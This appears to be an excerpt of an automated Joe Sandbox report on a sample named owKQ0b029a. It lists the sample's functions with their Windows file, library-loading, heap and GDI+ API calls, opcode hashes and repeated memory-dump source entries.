                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorLast_abort
                        • String ID:
                        • API String ID: 2991157371-0
                        • Opcode ID: c094816de6121db062d9a7c83a7c4a4bc2e8917b0e14a21db5e4a585b4da2754
                        • Instruction ID: 262817111c73a137c2b21363fedc3461ed90c199128de156028701f8bd75cd37
                        • Opcode Fuzzy Hash: c094816de6121db062d9a7c83a7c4a4bc2e8917b0e14a21db5e4a585b4da2754
                        • Instruction Fuzzy Hash: 2331E231900204AFDB10FFA9D941BADB7F5EF4132CF2100AAE8159B2E1EB319E41DB59
                        APIs
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?), ref: 00C71BC9
                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800), ref: 00C71BFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 606f73a5c798c100700314c0244235022297eb2086a598d599c9bf872974c17d
                        • Instruction ID: fb4b10dafe27f5764a3b2ab0785eb89f9a3b7e974bfd526f1afbe75a396ea008
                        • Opcode Fuzzy Hash: 606f73a5c798c100700314c0244235022297eb2086a598d599c9bf872974c17d
                        • Instruction Fuzzy Hash: 522107B1404748AFD7308F28CC85FAB7BE8FB09764F048A1DF9E9821D1D274AD499B61
                        APIs
                        • FlushFileBuffers.KERNEL32(?), ref: 00C7203C
                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C720EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: File$BuffersFlushTime
                        • String ID:
                        • API String ID: 1392018926-0
                        • Opcode ID: 0150cc466112a12fc442179221fd16adeaa1d3995a7512996acdba5e8ab38512
                        • Instruction ID: c8e30580c6dde1bdd6ea5bda3e617e1cfc72acca7b7229530898941c97367db3
                        • Opcode Fuzzy Hash: 0150cc466112a12fc442179221fd16adeaa1d3995a7512996acdba5e8ab38512
                        • Instruction Fuzzy Hash: 3D21F331248285AFC710DE35C885EABBBE4AF65304F04891DF8E987151C729EE4CDBA2
                        APIs
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8C601
                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C8C60E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AddressProc__crt_fast_encode_pointer
                        • String ID:
                        • API String ID: 2279764990-0
                        • Opcode ID: 4e04a8055f8289dbc6d8d23000b7b172a2e3c2cb14fc2f171927a9a151f22e04
                        • Instruction ID: f5f6bd9fae60f4bcbb30cc10fef99e7715fabc15d12efa19cd8b3b05c8853f44
                        • Opcode Fuzzy Hash: 4e04a8055f8289dbc6d8d23000b7b172a2e3c2cb14fc2f171927a9a151f22e04
                        • Instruction Fuzzy Hash: E5113D33A006205F8F21AF29EC8065E73959B843247160235FD24EB254DA30ED0297E8
                        APIs
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00C72131
                        • GetLastError.KERNEL32 ref: 00C7213D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer
                        • String ID:
                        • API String ID: 2976181284-0
                        • Opcode ID: b0846405ee0182017faf69ec3d268d552d35178ef0ddb76d1182e33bdbaf9e3b
                        • Instruction ID: 10c5b964cedb22f72a10d54dabf808295987dff0d9db2126bd301fd8a72b15d7
                        • Opcode Fuzzy Hash: b0846405ee0182017faf69ec3d268d552d35178ef0ddb76d1182e33bdbaf9e3b
                        • Instruction Fuzzy Hash: 2A019270701340ABDB349E29DC48B6FB6E9AB84314F95863EB26AC76C0CA31DD0CC721
                        APIs
                        • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00C71EFB
                        • GetLastError.KERNEL32 ref: 00C71F08
                          • Part of subcall function 00C71CFA: __EH_prolog.LIBCMT ref: 00C71CFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorFileH_prologLastPointer
                        • String ID:
                        • API String ID: 4236474358-0
                        • Opcode ID: 3329ab089bee77edb60da4e5ebce1820b1fb0e8eaf8b094557dad616319b20d4
                        • Instruction ID: f3082b0c703ef56f0569f1ebd1f2f3b5e8d3c80403f6c7554828d0f5b0141459
                        • Opcode Fuzzy Hash: 3329ab089bee77edb60da4e5ebce1820b1fb0e8eaf8b094557dad616319b20d4
                        • Instruction Fuzzy Hash: 6601B532600205DB9B188EAD9C58AAA775DAF9173030CC229FC3A8B291C770DD0597A0
                        APIs
                        • _free.LIBCMT ref: 00C8C0A1
                          • Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A
                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,00C8D871,?,00000004,00000000,?,?,?,00C8A0D6,?,00000000), ref: 00C8C0DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Heap$AllocAllocate_free
                        • String ID:
                        • API String ID: 2447670028-0
                        • Opcode ID: 3d54aebfe0ebaf09ea26d41923ccf7e4fe9f8173af0ae50eddec86005c1dad57
                        • Instruction ID: 73b6ab7edb3defd7ee02873f5ccc3566b3a3d4e7717c0e395bd4c32d0d73bcc5
                        • Opcode Fuzzy Hash: 3d54aebfe0ebaf09ea26d41923ccf7e4fe9f8173af0ae50eddec86005c1dad57
                        • Instruction Fuzzy Hash: 3AF0C231241205FAAB313A26DC81B6F27289F917E8F15012BF824A71A1DB70CD00A3BE
                        APIs
                        • SetFileAttributesW.KERNELBASE(?,00000000,?,?,00C724F3,?,?), ref: 00C726D1
                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,?,00C724F3,?,?), ref: 00C72702
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: efe6c84b17b95821365cbfb999974b71b682083fa0e320c77a2123bbfe29b519
                        • Instruction ID: 6990f16283b5e68b6cb6918a82d6b6e2d173bd69ebc917797376f794c0f2d10f
                        • Opcode Fuzzy Hash: efe6c84b17b95821365cbfb999974b71b682083fa0e320c77a2123bbfe29b519
                        • Instruction Fuzzy Hash: 55F030352412096BDF116F60ED85FED77ACFB043C1F488055BD889A161DB32DA99AB90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ItemText_swprintf
                        • String ID:
                        • API String ID: 3011073432-0
                        • Opcode ID: c446124758bc7207e88c7983da6b86738dc0db74f6c27713a2fea65399cc05d0
                        • Instruction ID: b0b30cb5b9e53b95e23e136b965d1f570cf3f7a427fd6339dea7481b68d95ab0
                        • Opcode Fuzzy Hash: c446124758bc7207e88c7983da6b86738dc0db74f6c27713a2fea65399cc05d0
                        • Instruction Fuzzy Hash: 0AF0EC7195434836EB11FBB09C07FAE375C9704785F1441D6FB04520E2D9715A15A766
                        APIs
                        • DeleteFileW.KERNELBASE(?,?,?,00C71C61,?,?,00C71A78), ref: 00C723A8
                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00C71C61,?,?,00C71A78), ref: 00C723D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: e05408df693fbca919a92b6dc0b330bddf4a6428f390152f67831e05c65195f7
                        • Instruction ID: 185df3a79470343bc6366ea3b7a112dbaffd9e402966683f3ec22c90b1a5e6d7
                        • Opcode Fuzzy Hash: e05408df693fbca919a92b6dc0b330bddf4a6428f390152f67831e05c65195f7
                        • Instruction Fuzzy Hash: A3E09B316401085BDB015F61DC45BED77ACFF043C1F488065BD88C3161DB31DD94ABA0
                        APIs
                        • GetFileAttributesW.KERNELBASE(?), ref: 00C7240F
                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800), ref: 00C7243B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: d40571af818887c30dc56f7451870152f5cebbcec1ab75e27b25390c14c96ca9
                        • Instruction ID: 4abd779782f95438d31011b8382c91490b646109cdabcef9e53bbfdb4428e828
                        • Opcode Fuzzy Hash: d40571af818887c30dc56f7451870152f5cebbcec1ab75e27b25390c14c96ca9
                        • Instruction Fuzzy Hash: A3E092359011285BCB11AB68DC09BE97BACAB087E1F0442A1FD6CD32A1D6719E849BD0
                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
                        • LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystem
                        • String ID:
                        • API String ID: 1175261203-0
                        • Opcode ID: 7d209009cd58b10bc5fca1e03ce13c7d8bcb608d92ce5f15253f581c28306797
                        • Instruction ID: 461b4e561a25ebb34700973a221e5d9df1bf967332e2dcfb866b3e084e10dc15
                        • Opcode Fuzzy Hash: 7d209009cd58b10bc5fca1e03ce13c7d8bcb608d92ce5f15253f581c28306797
                        • Instruction Fuzzy Hash: 11E0487690015C6BDB11AB94DC09FEB77ACEF0C3D1F0440A6BA4CD2004DAB5DA509BF0
                        APIs
                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7D87B
                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C7D882
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: BitmapCreateFromGdipStream
                        • String ID:
                        • API String ID: 1918208029-0
                        • Opcode ID: 2b1aca8a0982b6035731bf7ed354b71cf7ba88181897dfa2277183c07a8e62e0
                        • Instruction ID: 91ac4430b7ec228f0feb4c4e93263085b48bf17aab759c7393354c230d46661d
                        • Opcode Fuzzy Hash: 2b1aca8a0982b6035731bf7ed354b71cf7ba88181897dfa2277183c07a8e62e0
                        • Instruction Fuzzy Hash: A4E06DB1910208EBCB10EF89C900BA9B7FCEF05350F10805AE88993340E670AE40AB95
                        APIs
                        • GdiplusShutdown.GDIPLUS(?,?,?,00C942B1,000000FF), ref: 00C7DFFD
                        • OleUninitialize.OLE32(?,?,?,00C942B1,000000FF), ref: 00C7E002
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: GdiplusShutdownUninitialize
                        • String ID:
                        • API String ID: 3856339756-0
                        • Opcode ID: 6260e1549b44a31d6dac1790c4b66139171ec77884cfa6ef53d68045935a1703
                        • Instruction ID: d3d985ffb4ea31bb6a6b0088bfa0b15c5f906ce820ca92df905813e426ccf3b2
                        • Opcode Fuzzy Hash: 6260e1549b44a31d6dac1790c4b66139171ec77884cfa6ef53d68045935a1703
                        • Instruction Fuzzy Hash: 15E01A76944A449FC720DF48D845B69B7ECFB09B20F04476AB81993B50DB346801CB91
                        APIs
                          • Part of subcall function 00C8698A: try_get_function.LIBVCRUNTIME ref: 00C8699F
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C85A0E
                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C85A19
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                        • String ID:
                        • API String ID: 806969131-0
                        • Opcode ID: 90a000e232c4544e477b37df6751bbe3e3f26ec64719224b97f65abb3473a3c2
                        • Instruction ID: a62c5b4fe602f7e117724b7aaf7e45a2e994b9ea578de42b035025366a3d888a
                        • Opcode Fuzzy Hash: 90a000e232c4544e477b37df6751bbe3e3f26ec64719224b97f65abb3473a3c2
                        • Instruction Fuzzy Hash: C4D0A928824F0298C80C367428C72FA23889A127BC3A053ABE4208A1C2EBA18002332D
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ItemShowWindow
                        • String ID:
                        • API String ID: 3351165006-0
                        • Opcode ID: 2513947d036aa7cabdebdc29ffb965b428eeef810d26dfc7a76c6dd66a2beca3
                        • Instruction ID: 1282f53d30142a1a915238024df4e8e4f03af1f866d2f3469a07525b2764da24
                        • Opcode Fuzzy Hash: 2513947d036aa7cabdebdc29ffb965b428eeef810d26dfc7a76c6dd66a2beca3
                        • Instruction Fuzzy Hash: 9BC01236158140BECB014B70EC0DE2E7BA8AB95211F15C919B0B9C1060C638C010EB11
                        APIs
                        • GetDlgItem.USER32(?,?), ref: 00C7114B
                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00C71152
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CallbackDispatcherItemUser
                        • String ID:
                        • API String ID: 4250310104-0
                        • Opcode ID: 1a968d2df2e047b2f59cf566f3379b33c95036d1ec4da875189e52b63e235501
                        • Instruction ID: 737199473d55e459165b6b91b3554aba23ca506d4c08dfdc757263688862c96b
                        • Opcode Fuzzy Hash: 1a968d2df2e047b2f59cf566f3379b33c95036d1ec4da875189e52b63e235501
                        • Instruction Fuzzy Hash: 68C04C76408280FFCB015BA1AD0CE2FBFA9AB95321F14C81EB5ADC0430CA358421EB11
                        APIs
                        • __EH_prolog.LIBCMT ref: 00C7E2FE
                          • Part of subcall function 00C71D7B: CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000), ref: 00C71DFB
                          • Part of subcall function 00C71D7B: GetLastError.KERNEL32(?,?,00000000,00000003,-00000001,00000000), ref: 00C71E08
                          • Part of subcall function 00C71D7B: CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E3D
                          • Part of subcall function 00C71D7B: GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E45
                          • Part of subcall function 00C720FB: SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00C72131
                          • Part of subcall function 00C720FB: GetLastError.KERNEL32 ref: 00C7213D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
